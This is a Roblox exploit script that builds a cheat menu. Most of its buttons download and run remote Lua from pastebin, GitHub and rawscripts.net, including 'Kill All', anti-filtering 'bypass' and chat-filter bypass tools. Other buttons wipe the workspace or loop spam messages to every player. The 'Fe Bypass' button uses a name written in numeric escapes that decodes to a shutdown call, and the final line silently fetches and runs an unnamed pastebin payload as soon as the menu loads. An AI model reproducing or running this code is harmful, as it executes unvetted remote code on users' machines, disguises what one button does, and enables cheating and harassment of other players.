local ScreenGui = Instance.new("ScreenGui") local Main = Instance.new("Frame") local TextLabel = Instance.new("TextLabel") local TextButton = Instance.new("TextButton") local TextButton_2 = Instance.new("TextButton") local TextButton_3 = Instance.new("TextButton") local TextButton_4 = Instance.new("TextButton") local TextButton_5 = Instance.new("TextButton") local TextButton_6 = Instance.new("TextButton") local TextButton_7 = Instance.new("TextButton") local TextButton_8 = Instance.new("TextButton") local TextButton_9 = Instance.new("TextButton") local TextButton_10 = Instance.new("TextButton") local TextButton_11 = Instance.new("TextButton") local TextButton_12 = Instance.new("TextButton") local TextButton_13 = Instance.new("TextButton") local TextButton_14 = Instance.new("TextButton") local TextButton_15 = Instance.new("TextButton") local TextButton_16 = Instance.new("TextButton") local TextLabel_2 = Instance.new("TextLabel") --Properties: ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Main.Name = "Main" Main.Parent = ScreenGui Main.BackgroundColor3 = Color3.fromRGB(11, 11, 11) Main.BorderColor3 = Color3.fromRGB(255, 255, 255) Main.BorderSizePixel = 5 Main.Position = UDim2.new(0.21171169, 0, 0.181818172, 0) Main.Size = UDim2.new(0, 383, 0, 237) Main.Active = true Main.Draggable = true TextLabel.Parent = Main TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BorderSizePixel = 4 TextLabel.Position = UDim2.new(-0.0652741492, 0, 0, 0) TextLabel.Size = UDim2.new(0, 429, 0, 41) TextLabel.Font = Enum.Font.PatrickHand TextLabel.Text = "4nn1 Gui" TextLabel.TextColor3 = Color3.fromRGB(225, 0, 3) TextLabel.TextScaled = true TextLabel.TextSize = 14.000 TextLabel.TextWrapped = true TextButton.Parent = Main TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton.BorderSizePixel = 3 TextButton.Position = UDim2.new(0.0208877288, 0, 0.23206751, 0) TextButton.Size = UDim2.new(0, 68, 0, 30) TextButton.Font = Enum.Font.PatrickHand TextButton.Text = "Clear WorkSpace" TextButton.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton.TextScaled = true TextButton.TextSize = 14.000 TextButton.TextWrapped = true TextButton.MouseButton1Down:connect(function() asgw = game.Workspace:GetChildren() for i,v in pairs(asgw) do if v.Name ~= "Terrain" and v.Name ~= "Camera" then v:Destroy() end end end) TextButton_2.Parent = Main TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_2.BorderSizePixel = 3 TextButton_2.Position = UDim2.new(0.263707578, 0, 0.23206751, 0) TextButton_2.Size = UDim2.new(0, 68, 0, 30) TextButton_2.Font = Enum.Font.PatrickHand TextButton_2.Text = "Kill All" TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_2.TextScaled = true TextButton_2.TextSize = 14.000 TextButton_2.TextWrapped = true TextButton_2.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))() end) TextButton_3.Parent = Main TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_3.BorderSizePixel = 3 TextButton_3.Position = UDim2.new(0.498694509, 0, 0.23206751, 0) TextButton_3.Size = UDim2.new(0, 68, 0, 30) TextButton_3.Font = Enum.Font.PatrickHand TextButton_3.Text = "Music Play" TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_3.TextScaled = true TextButton_3.TextSize = 14.000 TextButton_3.TextWrapped = true TextButton_3.MouseButton1Down:connect(function() --Made by Servano local s = Instance.new("Sound") s.Name = "Sound" s.SoundId = "http://www.roblox.com/asset/?id=5409360995" s.Volume = 9999999999999 s.Pitch = 1.2 s.Looped = true s.archivable = false s.Parent = game.Workspace wait(1) s:play() end) TextButton_4.Parent = Main TextButton_4.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_4.BorderSizePixel = 3 TextButton_4.Position = UDim2.new(0.736292422, 0, 0.23206751, 0) TextButton_4.Size = UDim2.new(0, 68, 0, 30) TextButton_4.Font = Enum.Font.PatrickHand TextButton_4.Text = "ServerSide QuirkyAdmin" TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_4.TextScaled = true TextButton_4.TextSize = 14.000 TextButton_4.TextWrapped = true TextButton_4.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))() end) TextButton_5.Parent = Main TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_5.BorderSizePixel = 3 TextButton_5.Position = UDim2.new(0.736292422, 0, 0.434599161, 0) TextButton_5.Size = UDim2.new(0, 68, 0, 30) TextButton_5.Font = Enum.Font.PatrickHand TextButton_5.Text = "Fe Bypass" TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_5.TextScaled = true TextButton_5.TextSize = 14.000 TextButton_5.TextWrapped = true TextButton_5.MouseButton1Down:connect(function() local net = game.NetworkClient local filteringEnabledPatch = "\83\104\117\116\100\111\119\110" -- patch fe to be false local bypass = net.Parent[filteringEnabledPatch] bypass(game) -- apply fe bypass to datamodel workspace.FilteringEnabled = false -- replicate the disabling of fe -- anything you run below here will bypass fe -- print(workspace.FilteringEnabled) end) TextButton_6.Parent = Main TextButton_6.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_6.BorderSizePixel = 3 TextButton_6.Position = UDim2.new(0.498694509, 0, 0.434599161, 0) TextButton_6.Size = UDim2.new(0, 68, 0, 30) TextButton_6.Font = Enum.Font.PatrickHand TextButton_6.Text = "System Hacked" TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_6.TextScaled = true TextButton_6.TextSize = 14.000 TextButton_6.TextWrapped = true TextButton_6.MouseButton1Down:connect(function() --Made by Servano local A_1 = "hi [Tubers93] HACKING SYSTEM" local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) wait(1) end) TextButton_7.Parent = Main TextButton_7.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_7.BorderSizePixel = 3 TextButton_7.Position = UDim2.new(0.263707578, 0, 0.434599161, 0) TextButton_7.Size = UDim2.new(0, 68, 0, 30) TextButton_7.Font = Enum.Font.PatrickHand TextButton_7.Text = "Fe Bypass 2" TextButton_7.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_7.TextScaled = true TextButton_7.TextSize = 14.000 TextButton_7.TextWrapped = true TextButton_7.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/MaxizntC00l/FE-Roblox-Bypass-Universal-/refs/heads/main/FEBypass.lua"))() end) TextButton_8.Parent = Main TextButton_8.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_8.BorderSizePixel = 3 TextButton_8.Position = UDim2.new(0.0208877325, 0, 0.434599161, 0) TextButton_8.Size = UDim2.new(0, 68, 0, 30) TextButton_8.Font = Enum.Font.PatrickHand TextButton_8.Text = "Herbert" TextButton_8.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_8.TextScaled = true TextButton_8.TextSize = 14.000 TextButton_8.TextWrapped = true TextButton_8.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaGunsX/HerbertV1/main/main.lua", true))() end) TextButton_9.Parent = Main TextButton_9.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_9.BorderSizePixel = 3 TextButton_9.Position = UDim2.new(0.736292422, 0, 0.637130797, 0) TextButton_9.Size = UDim2.new(0, 68, 0, 30) TextButton_9.Font = Enum.Font.PatrickHand TextButton_9.Text = "Project Ligma" TextButton_9.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_9.TextScaled = true TextButton_9.TextSize = 14.000 TextButton_9.TextWrapped = true TextButton_9.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Project-Ligma-etc-9323"))() end) TextButton_10.Parent = Main TextButton_10.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_10.BorderSizePixel = 3 TextButton_10.Position = UDim2.new(0.498694509, 0, 0.637130797, 0) TextButton_10.Size = UDim2.new(0, 68, 0, 30) TextButton_10.Font = Enum.Font.PatrickHand TextButton_10.Text = "Console Hacked" TextButton_10.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_10.TextScaled = true TextButton_10.TextSize = 14.000 TextButton_10.TextWrapped = true TextButton_10.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Console-Flooder-24471"))() end) TextButton_11.Parent = Main TextButton_11.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_11.BorderSizePixel = 3 TextButton_11.Position = UDim2.new(0.263707578, 0, 0.637130797, 0) TextButton_11.Size = UDim2.new(0, 68, 0, 30) TextButton_11.Font = Enum.Font.PatrickHand TextButton_11.Text = "Krunox" TextButton_11.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_11.TextScaled = true TextButton_11.TextSize = 14.000 TextButton_11.TextWrapped = true TextButton_11.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Krunox-13336"))() end) TextButton_12.Parent = Main TextButton_12.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_12.BorderSizePixel = 3 TextButton_12.Position = UDim2.new(0.0208877325, 0, 0.637130797, 0) TextButton_12.Size = UDim2.new(0, 68, 0, 30) TextButton_12.Font = Enum.Font.PatrickHand TextButton_12.Text = "ToxicGames" TextButton_12.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_12.TextScaled = true TextButton_12.TextSize = 14.000 TextButton_12.TextWrapped = true TextButton_12.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/BOSSJKL2/TOXICGAMES/main/TOXICGAMES%20%20SS"))() end) TextButton_13.Parent = Main TextButton_13.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_13.BorderSizePixel = 3 TextButton_13.Position = UDim2.new(0.0208877325, 0, 0.83544302, 0) TextButton_13.Size = UDim2.new(0, 68, 0, 30) TextButton_13.Font = Enum.Font.PatrickHand TextButton_13.Text = "Ro-Xploit" TextButton_13.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_13.TextScaled = true TextButton_13.TextSize = 14.000 TextButton_13.TextWrapped = true TextButton_13.MouseButton1Down:Connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-ro-xploit-6-9233"))() end) TextButton_14.Parent = Main TextButton_14.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_14.BorderSizePixel = 3 TextButton_14.Position = UDim2.new(0.263707578, 0, 0.83544302, 0) TextButton_14.Size = UDim2.new(0, 68, 0, 30) TextButton_14.Font = Enum.Font.PatrickHand TextButton_14.Text = "MLG Gun" TextButton_14.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_14.TextScaled = true TextButton_14.TextSize = 14.000 TextButton_14.TextWrapped = true TextButton_14.MouseButton1Down:Connect(function() loadstring(game:HttpGet("https://gist.githubusercontent.com/zupersponge/8c39ed77f2817679294d70aff18d479d/raw/ed5e04b72c4fa77b8bf522d7275abf64ae585416/MLG%20Gun%20Script%20ROBLOX"))() end) TextButton_15.Parent = Main TextButton_15.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_15.BorderSizePixel = 3 TextButton_15.Position = UDim2.new(0.498694539, 0, 0.83544302, 0) TextButton_15.Size = UDim2.new(0, 68, 0, 30) TextButton_15.Font = Enum.Font.PatrickHand TextButton_15.Text = "Chat Bypass" TextButton_15.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_15.TextScaled = true TextButton_15.TextSize = 14.000 TextButton_15.TextWrapped = true TextButton_15.MouseButton1Down:Connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AnnaRoblox/AnnaBypasser/refs/heads/main/AnnaBypasser.lua"))() end) TextButton_16.Parent = Main TextButton_16.BackgroundColor3 = Color3.fromRGB(255, 0, 4) TextButton_16.BorderSizePixel = 3 TextButton_16.Position = UDim2.new(0.736292481, 0, 0.83544302, 0) TextButton_16.Size = UDim2.new(0, 68, 0, 30) TextButton_16.Font = Enum.Font.PatrickHand TextButton_16.Text = "Fe Messages 4NN1 AND BUN BUN GIRLS" TextButton_16.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_16.TextScaled = true TextButton_16.TextSize = 14.000 TextButton_16.TextWrapped = true TextButton_16.MouseButton1Down:Connect(function() local button2 = Instance.new("TextButton") button2.Size = UDim2.new(1, 0, 0, 30) button2.Position = UDim2.new(0, 0, 0, 60) button2.Text = "Chat Spam Loop" button2.BackgroundColor3 = Color3.fromRGB(0, 0, 255) button2.TextColor3 = Color3.fromRGB(255, 0, 0) button2.Parent = frame local loopRunning = false -- Variable to track if the loop is running local function loopFunction() while loopRunning do game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1:BUN BUN BUN BUN BUN", "All") wait(3) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("4NN1: BUN BUN BUN BUN BUN", "All") wait(3) end end local loopThread -- To store the loop thread button2.MouseButton1Click:Connect(function() if not loopRunning then loopRunning = true -- Start the loop loopThread = coroutine.create(loopFunction) coroutine.resume(loopThread) -- Start the loop in a new coroutine else loopRunning = false -- Stop the loop if loopThread then coroutine.resume(loopThread) -- Resume the loop coroutine to allow it to finish loopThread = nil end button2.Text = "Chat Spam" end end) end) TextLabel_2.Parent = Main TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BorderSizePixel = 4 TextLabel_2.Position = UDim2.new(-0.0652741492, 0, 0.995780587, 0) TextLabel_2.Size = UDim2.new(0, 429, 0, 41) TextLabel_2.Font = Enum.Font.PatrickHand TextLabel_2.Text = "BY 4NN1" TextLabel_2.TextColor3 = Color3.fromRGB(225, 0, 3) TextLabel_2.TextScaled = true TextLabel_2.TextSize = 14.000 TextLabel_2.TextWrapped = true local property = replicateproperty(workspace.FilteringEnabled) property = false workspace.FilteringEnabled = false loadstring(game:HttpGet("https://pastebin.com/raw/guSP5dE1"))()